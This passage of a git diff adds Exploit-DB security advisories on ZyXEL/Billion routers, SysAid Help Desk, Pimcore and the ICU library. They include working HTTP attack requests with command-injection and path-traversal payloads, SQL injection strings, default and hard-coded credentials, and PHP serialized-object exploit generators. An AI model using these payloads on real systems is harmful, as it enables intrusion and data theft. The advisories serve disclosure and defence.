https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/hardware/webapps/43884.txt b/exploits/hardware/webapps/43884.txt new file mode 100644 index 000000000..57adecb17 --- /dev/null +++ b/exploits/hardware/webapps/43884.txt @@ -0,0 +1,180 @@ +>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 26/12/2016 / Last updated: 18/01/2017 + + +>> Summary: +TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers. +Three router models - ZyXEL P660HN-T1A v1, ZyXEL P660HN-T1A v2 and Billion 5200W-T - contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities (running as root) in their web interfaces, mostly in the syslog remote forwarding function. All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers. + +These routers are based on the TC3162U SoC (or variants of it), a system-on-a-chip made by TrendChip, which was a manufacturer of SoC that was acquired by Ralink / MediaTek in 2011. +TC3162U based routers have two firmware variants. + +The first variant is "ras", used on hardware versions that have 4mb or less of flash storage, which is based on the real time operating system ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is vulnerable to the "misfortune cookie" attack (see [1]), and its web server is vulnerable to the "rom-0" attack (see [2]). +The other variant is "tclinux", which is a full fledged Linux used in hardware versions that have more than 4 MB of flash storage. This advisory refers to this variant, which includes the Boa web server and several ASP files with the command injection vulnerabilities. Note that tclinux might also be vulnerable to the misfortune cookie and rom-0 attacks - this was not investigated in detail by the author. For more information on tclinux see [3]. + +It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable. It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (while the default accounts are likely to be TrueOnline specific). Please contact pedrib@gmail.com if you find any other routers or firmware versions that have the same vulnerabilities. + +These vulnerabilities were discovered in July 2016 and reported through Securiteam's Secure Disclosure program (see https://blogs.securiteam.com/index.php/archives/2910 for their advisory). SSD contacted the vendors involved, but received no reply and posted their advisory on December 26th 2016. There is currently no fix for these issues. It is unknown whether these issues are exploitable over the WAN, although this is a possibility since some of the default accounts appear to have been deployed for ISP use. + +Three Metasploit modules that abuse these vulnerabilities have been released (see [4], [5] and [6]). + + +>> Update (18/01/2017): +ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml + + +>> Technical details: +#1 +Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T1A v1) +NO-CVE - use FD:2017/Jan/40-1 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints. +Affected versions: +- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected + +This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. +The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to 10.0.99.102: + +POST /cgi-bin/ViewLog.asp HTTP/1.1 +remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save + +The command in injection is in the remote_host parameter. +This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root. + + +#2 +Vulnerability: Authenticated command injection (ZyXEL P660HN-T1A v2) +NO-CVE - use FD:2017/Jan/40-2 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints. +Affected versions: +- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected + +Unlike in the P660HN-Tv1, the injection is authenticated and in the logSet.asp page. However, this router contains several default administrative accounts (see below) that can be used to exploit this vulnerability. +The injection is in the logSet.asp page that sets up remote forwarding of syslog logs, and the parameter vulnerable to command injection is the serverIP parameter. +The following request will cause the router to issue 3 ping requests to 1.1.1.1: + +POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1 +logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514 + +This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root. +It is known that this injection ends up in /etc/syslog.conf as +ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`&#" +Which will then be executed by a background process almost immediately. +The actual injection is limited to 28 characters. This can circunvented by writing a shell script file in the /tmp directory 28 characters at a time, and the executing that file. + + +#3 +Vulnerability: Unauthenticated command injection (Billion 5200W-T) +NO-CVE - use FD:2017/Jan/40-3 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints. +Affected versions: +- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other firmware versions might be affected + +The Billion 5200W-T router contains an unauthenticated command injection in adv_remotelog.asp page, which is used to set up remote syslog forwarding. +The following request will cause the router to issue 3 ping requests to 192.168.1.35: + +POST /cgi-bin/adv_remotelog.asp HTTP/1.1 +Host: 192.168.1.1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 85 + +RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514 + +The injection is on the syslogServerAddr parameter and can be exploited by entering a valid IP address, followed by ";;" +This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root. + + +#4 +Vulnerability: Authenticated command injection (Billion 5200W-T) +NO-CVE - use FD:2017/Jan/40-4 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints. +Affected versions: +- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected + +The Billion 5200W-T router also has several other command injections in its interface, depending on the firmware version, such as an authenticated command injection in tools_time.asp (uiViewSNTPServer parameter). +It should be noted that this router contains several default administrative accounts that can be used to exploit this vulnerability. +This injection can be exploited with the following request: + +POST /cgi-bin/tools_time.asp HTTP/1.1 +Host: 192.168.1.1 +Authorization: Basic YWRtaW46cGFzc3dvcmQ= +Cookie: SESSIONID=7c082c75 + +SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA + +This writes the command to a file /etc/ntp.sh: +/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" & +which is then executed almost immediately. + +This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root. + + +#5 +Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v1) +NO-CVE - use FD:2017/Jan/40-5 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: N/A +Affected versions: +- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected + +This router contains the following default administrative accounts: +username: admin; password: password +username: true; password: true + + +#6 +Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v2) +NO-CVE - use FD:2017/Jan/40-6 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: N/A +Affected versions: +- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected + +This router contains the following default administrative accounts: +username: admin; password: password +username: true; password: true +username: supervisor; password: zyad1234 + + +#7 +Vulnerability: Default administrative credentials (Billion 5200W-T) +NO-CVE - use FD:2017/Jan/40-7 (Full Disclosure) or SSD-2910 (SecuriTeam blog) +Attack Vector: Remote +Constraints: N/A +Affected versions: +- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected + +This router contains the following default administrative accounts: +username: admin; password: password +username: true; password: true +username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678 + + +>> Fix: +There is NO FIX for this vulnerability. Do not allow untrusted clients to connect to these routers. Timeline of disclosure: +July 2016: Vulnerability reported to Securiteam Secure Disclosure + Securiteam contacted the affected versions. No response. + +26.12.2016: Vulnerability information published in the SSD blog (https://blogs.securiteam.com/index.php/archives/2910 for their advisory). +12.01.2017: Vulnerability information published in https://github.com/pedrib/PoC +18.01.2017: ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml + + +>> References: +[1] http://www.kb.cert.org/vuls/id/561444 +[2] https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/ +[3] https://vasvir.wordpress.com/tag/trendchip-firmware/ +[4] https://github.com/rapid7/metasploit-framework/pull/7820 +[5] https://github.com/rapid7/metasploit-framework/pull/7821 +[6] https://github.com/rapid7/metasploit-framework/pull/7822 + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/hardware/webapps/43885.txt b/exploits/hardware/webapps/43885.txt new file mode 100644 index 000000000..b2aa80512 --- /dev/null +++ b/exploits/hardware/webapps/43885.txt @@ -0,0 +1,232 @@ +>> Multiple vulnerabilities in SysAid Help Desk 14.4 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +================================================================================= +Disclosure: 03/06/2015 / Last updated: 10/06/2015 + +>> Background on the affected product: +"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance." + +Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon. +All vulnerabilities affect both the Windows and Linux versions unless otherwise noted. + + +>> Technical details: +1) +Vulnerability: Administrator account creation +CVE-2015-2993 (same CVE as #10) +Constraints: none; no authentication or any other information needed +Affected versions: unknown, at least 14.4 + +GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 + +This creates an account with the following credentials: mr_lit:secret +Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted. + + +2) +Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution) +CVE-2015-2994 +Constraints: valid administrator account needed (see #1 to create a valid admin account) +Affected versions: unknown, at least 14.4 + + +POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 +Content-Type: multipart/form-data; boundary=---------------------------81351919525780 + +-----------------------------81351919525780 +Content-Disposition: form-data; name="activation"; filename="whatevs.jsp" +Content-Type: application/octet-stream + +<%out.println(System.getProperty("os.name"));%> +-----------------------------81351919525780-- + + +The response returns a page which contains the following: + var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501"; + var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501"; + if(imageUrl != null && $.trim(imageUrl).length > 0) + { + document.getElementById("cropbox").src = imageUrl; + document.getElementById("preview").src = thumbUrl; + parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp"; + +Go to http:///sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP. + + +3) +Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution) +CVE-2015-2995 +Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details. +Affected versions: unknown, at least 14.3 and 14.4 + +POST /sysaid/rdslogs?rdsName=../../../../sample.war%00 +<... WAR payload here ...> + + +4) +Vulnerability: Arbitrary file download +CVE-2015-2996 (same CVE as #8) +Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path) +Affected versions: unknown, at least 14.4 + +GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd + + +5) +Vulnerability: Path disclosure +CVE-2015-2997 +Constraints: none; no authentication or any other information needed +Affected versions: unknown, at least 14.4; only works on the Linux version + +POST /sysaid/getAgentLogFile?accountId=&computerId= + +Metasploit PoC: + + large_traversal = '../' * rand(15...30) + servlet_path = 'getAgentLogFile' + + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), + 'method' => 'POST', + 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))), + 'ctype' => 'application/octet-stream', + 'vars_get' => { + 'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)), + 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) + } + }) + +The response (res.body.to_s) will be similar to: + + +Error + +

Internal Error No#14

+

/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)

+ + +The tomcat path is revealed between the H2 tags. + + +6) +Vulnerability: Use of hard-coded cryptographic key +CVE-2015-2998 +Constraints: N/A +Affected versions: unknown, at least 14.4 + +SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file. +Algorithm: DES password based encryption with MD5 hash +Key: "inigomontoya" +Salt: [-87, -101, -56, 50, 86, 53, -29, 3] +Iterations: 19 + + +7) +Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp +CVE-2015-2999 +Constraints: valid administrator account needed +Affected versions: unknown, at least 14.4 + +a) +POST /sysaid/genericreport HTTP/1.1 +action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin + +action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no + +action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin + +Parameters: +groupFilter +customSQL + +(3 sample payloads are shown - the reportName has to be valid and each reportName expects different parameters) + + +b) +POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE +resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= + +Parameter: +dir + + +c) +POST /sysaid/RFCGantt.jsp HTTP/1.1 +listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true + +Accepts injection between $$ in ganttSQL parameter. + + +8) +Vulnerability: Denial of service +CVE-2015-2996 (same CVE as #4) +Constraints: no authentication or any other information needed +Affected versions: unknown, at least 14.4 + +GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero + +This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). + + +9) +Vulnerability: XML Entity Expansion (leading to denial of service) +CVE-2015-3000 +Constraints: no authentication or any other information needed +Affected versions: unknown, at least 14.4 + +a) +POST /sysaid/agententry?deflate=0 + + + + + + + + + + + + +]> +&lol9; + +b) +POST /sysaid/rdsmonitoringresponse + + +c) +POST /sysaid/androidactions + + +These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). + + +10) +Vulnerability: Uncontrolled file overwrite +CVE-2015-2993 (same CVE as #1) +Constraints: no authentication or any other information needed +Affected versions: unknown, at least 14.4 + +GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm + +This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker. + + +11) +Vulnerability: Use of hard-coded password for the SQL Server Express administrator account +CVE-2015-3001 +Constraints: N/A +Affected versions: unknown, at least 14.4 + +When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1". + + +>> Fix: +Upgrade to version 15.2 or higher. + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/hardware/webapps/43886.txt b/exploits/hardware/webapps/43886.txt new file mode 100644 index 000000000..df459587c --- /dev/null +++ b/exploits/hardware/webapps/43886.txt @@ -0,0 +1,202 @@ +> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive) +> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security +==================================================================== +Disclosure: 14/04/2014 / Last updated: 12/10/2014 + +Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2921) +Vulnerability: Arbitrary file deletion in Pimcore CMS via unserialize() PHP object injection (CVE-2014-2922) +File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221) + +Summary: +This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from [3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all PHP versions. + +Versions affected: +1.4.9 to 1.4.10 (inclusive) / 2.0.0 (possibly): Remote code execution (when server is running PHP <= 5.3.3). +1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution. +Version 2.2.0 or higher resolves this vulnerability. + +Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not possible, but the requirement was only enforced in 2.0.1. +Note that however the underlying vulnerability for both the remote code execution and the arbitrary file deletion is the same (unserialize() object injection), so it might be possible to execute code if any other Zend PHP POP chains are found in the future. + + +Fix for vulnerability: +https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280 + + +Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13): +https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7 + + +PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13): +https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b + + +Code snippets: + +pimcore/lib/Pimcore/Tool/Newsletter.php(221): + + public function getObjectByToken($token) { + $data = unserialize(base64_decode($token)); + if($data) { + if($object = Object_Abstract::getById($data["id"])) { + + if($version = $object->getLatestVersion()) { + $object = $version->getData(); + } + + +This function is called in the same file in confirm() and unsubscribeByToken(): + public function confirm($token) { + + $object = $this->getObjectByToken($token); + if($object) { + + + public function unsubscribeByToken ($token) { + + $object = $this->getObjectByToken($token); + if($object) { + + +In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you to take the sample code and modify it. +The sample code passes the token directly without any validation in confirmAction(): + public function confirmAction() { + + $this->enableLayout(); + + $this->view->success = false; + + $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list) + + if($newsletter->confirm($this->getParam("token"))) { + $this->view->success = true; + } + + +And also in unsubscribeAction(): + public function unsubscribeAction() { + + $this->enableLayout(); + + $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used for your class above (mailing list) + + $unsubscribeMethod = null; + $success = false; + + if($this->getParam("email")) { + $unsubscribeMethod = "email"; + $success = $newsletter->unsubscribeByEmail($this->getParam("email")); + } + + if($this->getParam("token")) { + $unsubscribeMethod = "token"; + $success = $newsletter->unsubscribeByToken($this->getParam("token")); + } + + +Mitigation: +Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0. + +References: +======================================================== +[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano) +'; +} + +class Zend_Search_Lucene_Storage_Directory_Filesystem +{ + protected $_dirPath = null; + + public function __construct($path) + { + $this->_dirPath = $path; + } +} + +interface Zend_Pdf_ElementFactory_Interface {} + +class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface +{ + protected $_docCount = 1; + protected $_name = 'foo'; + protected $_directory; + protected $_fields; + protected $_files; + + public function __construct($directory, $fields) + { + $this->_directory = $directory; + $this->_fields = array($fields); + $this->_files = new stdClass; + } +} + +class Zend_Pdf_ElementFactory_Proxy +{ + private $_factory; + + public function __construct(Zend_Pdf_ElementFactory_Interface $factory) + { + $this->_factory = $factory; + } +} + +// This null byte technique only works in PHP <= 5.3.3 +$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0"); +$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo); +$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory); + +echo base64_encode(serialize($____proxy)); + +?> + +======================================================== +[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf +[3] http://www.exploit-db.com/exploits/19573 +======================================================== +[4] Arbitrary file deletion, all PHP versions +stream = $stream; + return $this; + } + public function setCleanup($cleanup = true) { + $this->_cleanup = $cleanup; + } + public function setStreamName($stream_name) { + $this->stream_name = $stream_name; + return $this; + } +} +$resp = new Zend_Http_Response_Stream(); +$resp->setStream(null); +$resp->setCleanup(); +$resp->setStreamName("/tmp/deleteme"); + +echo base64_encode(serialize($resp)); +?> + +======================================================== +[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter +[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip). The file mentioned is website/controllers/NewsletterController.php. + +Other references: +https://www.owasp.org/index.php/PHP_Object_Injection +http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/ +http://vagosec.org/2013/12/wordpress-rce-exploit/ + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/local/43887.txt b/exploits/multiple/local/43887.txt new file mode 100644 index 000000000..8838acae0 --- /dev/null +++ b/exploits/multiple/local/43887.txt @@ -0,0 +1,83 @@ +>> Heap overflow and integer overflow in ICU library (v52 to v54) +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +================================================================================= +Disclosure: 04/05/2015 / Last updated: 07/05/2015 + +>> Background on the affected products: +ICU is a mature, widely used set of C/C++ and Java libraries providing Unicode and Globalization support for software applications. ICU is widely portable and gives applications the same results on all platforms and between C/C++ and Java software. + + +>> Summary: +While fuzzing LibreOffice an integer overflow and a heap overflow were found in the ICU library. This library is used by LibreOffice and hundreds of other software packages. +Proof of concept files can be downloaded from [1]. These files have been tested with LibreOffice 4.3.3.2 and LibreOffice 4.4.0-beta2 and ICU 52. +Note that at this point in time it is unknown whether these vulnerabilities are exploitable. +Thanks to CERT [2] for helping disclose these vulnerabilities. + + +>> Technical details: +#1 +Vulnerability: Heap overflow +CVE-2014-8146 + +The code to blame is the following (from ubidi.c:2148 in ICU 52): + dirProp=dirProps[limit-1]; + if((dirProp==LRI || dirProp==RLI) && limitlength) { + pBiDi->isolateCount++; + pBiDi->isolates[pBiDi->isolateCount].stateImp=stateImp; + pBiDi->isolates[pBiDi->isolateCount].state=levState.state; + pBiDi->isolates[pBiDi->isolateCount].start1=start1; + } + else + processPropertySeq(pBiDi, &levState, eor, limit, limit); + +Under certain conditions isolateCount is incremented too many times, which results in several out of bounds writes. See [1] for a more detailed analysis. + + +#2 +Vulnerability: Integer overflow +CVE-2014-8147 + +The overflow is on the resolveImplicitLevels function (ubidi.c:2248): + pBiDi->isolates[pBiDi->isolateCount].state=levState.state; + +pBiDi->isolates[].state is a int16, while levState.state is a int32. +The overflow causes an error when performing a malloc on pBiDi->insertPoints->points because insertPoints is adjacent in memory to isolates[]. + +The Isolate struct is defined in ubidiimp.h:184 +typedef struct Isolate { + int32_t startON; + int32_t start1; + int16_t stateImp; + int16_t state; +} Isolate; + +LevState is defined in ubidi.c:1748 +typedef struct { + const ImpTab * pImpTab; /* level table pointer */ + const ImpAct * pImpAct; /* action map array */ + int32_t startON; /* start of ON sequence */ + int32_t startL2EN; /* start of level 2 sequence */ + int32_t lastStrongRTL; /* index of last found R or AL */ + int32_t state; /* current state */ + int32_t runStart; /* start position of the run */ + UBiDiLevel runLevel; /* run level before implicit solving */ +} LevState; + + +>> Fix: +All ICU releases between 52 and 54 are affected. Upgrade to ICU 55.1 to fix these vulnerabilities. +There are many other software packages which embed the ICU code and will need to be updated. +Patches that fix these vulnerabilities can be obtained from the ICU project in [3] and [4]. + + +>> References: +[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43887.zip) +[2] https://www.kb.cert.org/vuls/id/602540 +[3] http://bugs.icu-project.org/trac/changeset/37080 +[4] http://bugs.icu-project.org/trac/changeset/37162 + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/39288.txt b/exploits/multiple/webapps/39288.txt index 0e8288236..e8d498abb 100644 --- a/exploits/multiple/webapps/39288.txt +++ b/exploits/multiple/webapps/39288.txt @@ -10,4 +10,83 @@ ManageEngine Password Manager Pro 5 through 7 build 7003 ManageEngine IT360 8 through 10.1.1 build 10110 www.example.com/MetadataServlet.dat?sv=[SQLi] -www.example.com/console/MetadataServlet.dat?sv=[SQLi] \ No newline at end of file +www.example.com/console/MetadataServlet.dat?sv=[SQLi] + + + + + + + +>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions) +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 19/08/2014 / Last updated: 05/02/2015 + +>> Background on the affected products: +"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more." + +"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises." + +"Managing 